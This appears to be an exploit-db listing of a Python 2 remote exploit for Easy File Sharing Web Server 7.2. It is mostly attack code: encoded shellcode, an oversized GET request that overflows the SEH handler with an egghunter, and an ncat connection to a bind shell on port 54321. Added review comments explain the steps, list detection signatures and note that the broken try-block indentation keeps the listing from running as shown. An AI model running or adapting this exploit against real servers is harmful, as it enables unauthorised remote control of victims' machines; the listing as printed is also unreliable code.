Easy File Sharing Web Server 7.2 – Remote Overflow (Egghunter) (SEH)

  • 作者: ch3rn0byl
    日期: 2016-07-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40178/
  • #!/usr/bin/python
    # Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter
    # Date: July 29, 2016
    # Exploit Author: ch3rn0byl
    # Vendor Homepage: http://www.sharing-file.com/
    # Software Link: http://www.sharing-file.com/download.php
    # Version: 7.2
    # Tested on: Windows 7, 8, 8.1, 10
    # Admin privileges anyone?? hehe ;)
    
    # --- Review notes ---------------------------------------------------------
    # Proof-of-concept script from the exploit-db listing above.  It is written
    # for Python 2 (print statements, str-typed socket payload) and will not run
    # unchanged on Python 3.  In this copy the body of the try/except/finally at
    # the bottom has also lost its indentation, so the listing as shown is not
    # syntactically valid either.
    #
    # What the visible code does: build one oversized HTTP request, send it to
    # TCP/80 on the host given as argv[1], wait two seconds, then run
    # `ncat <host> 54321`.  The script therefore expects a listener to appear on
    # TCP/54321 of the target after the request; nothing in this listing shows
    # what opens that port (presumably the encoded payload -- unverified).
    #
    # Detection material that needs no understanding of the payload bytes:
    #   * a GET whose request-target is ~5.5 KB of long 'A'/'D' runs
    #   * the literal marker 'hivehive' on the line after the request headers
    #   * an outbound/inbound connection on port 54321 of a web server host
    # Mitigation: the header pins vendor and version (Easy File Sharing Web
    # Server 7.2); keep it off untrusted networks and prefer upgrade/removal.
    from socket import socket, AF_INET, SOCK_STREAM
    from sys import argv
    from struct import pack
    from time import sleep
    from subprocess import call
    
    # Only argument: target host.  No validation -- a missing argv[1] raises
    # IndexError before anything is sent.
    host = argv[1]
    
    # Encoded machine code (~375 bytes by count of the escapes), appended after
    # the 'hivehive' tag below.  Its behaviour cannot be determined from this
    # listing; the author's header ("Admin privileges anyone??") hints at a
    # privileged shell -- treat that as a claim, not a fact.
    rekt =""
    rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
    rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
    rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
    rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
    rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
    rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
    rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
    rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
    rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
    rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
    rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
    rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
    rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
    rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
    rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
    rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
    rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
    rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
    rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
    rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
    rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
    rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
    rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
    rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
    rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
    rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
    rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
    rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
    rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"
    
    # Our tag is hive: \x68\x69\x76\x65
    
    # 32-byte stub placed in the request-target; it embeds the 4-byte 'hive'
    # tag noted above, and the request body below carries that tag doubled
    # ('hivehive') directly in front of `rekt`.  The tag is the cheapest
    # signature on the wire for this particular script.
    egghunter = ''
    egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
    egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
    egghunter += '\xea\xaf\x75\xe7\xff\xe7'
    
    # Request-target filler, exactly 5500 bytes: 4061 x 'A', two fixed
    # little-endian 32-bit constants (presumably build-specific addresses --
    # the header pins version 7.2; not verifiable from this listing), the
    # 32-byte stub, then 'D' padding up to the 5500 total.
    crash = "A" * 4061
    crash += pack('<L', 0x909006eb)
    crash += pack('<L', 0x10019ce3)
    crash += egghunter
    crash += "D" * (5500 - 4061 - 8 - len(egghunter))
    
    # The 5500-byte string becomes the request-target of a single GET.  After
    # the blank line that ends the headers, the body is 'hivehive' + rekt + 'E'
    # padding, so that everything after the tag is exactly 800 bytes.
    payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
    payload += 'hivehive'
    payload += rekt
    payload += 'E' * (800 - len(rekt))
    
    print '[+] Trying to exploit {}...'.format(host)
    
    # NOTE: the indentation of this try/except/finally is missing in this copy;
    # as shown it is a SyntaxError.  Both `except:` clauses are bare, so they
    # swallow everything (including KeyboardInterrupt) and print one generic
    # line; `finally` prints unconditionally, success or not.
    try:
    # One plain TCP connection to port 80, one send, then close.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 80))
    print '[+] Sending payload...'
    s.send(payload)
    s.close()
    print '[+] Trying to connect to target...\n'
    try:
    # Two-second pause, then an external `ncat` (must be on PATH; list form,
    # no shell) to the target on TCP/54321 -- the only place that port appears.
    sleep(2)
    call(['ncat', host, '54321'])
    except:
    print '[!] Whoops!! Something went wrong?'
    except:
    print '[!] Whoops!! Something went wrong?'
    finally:
    print '\n[+] I <3 SHELLS'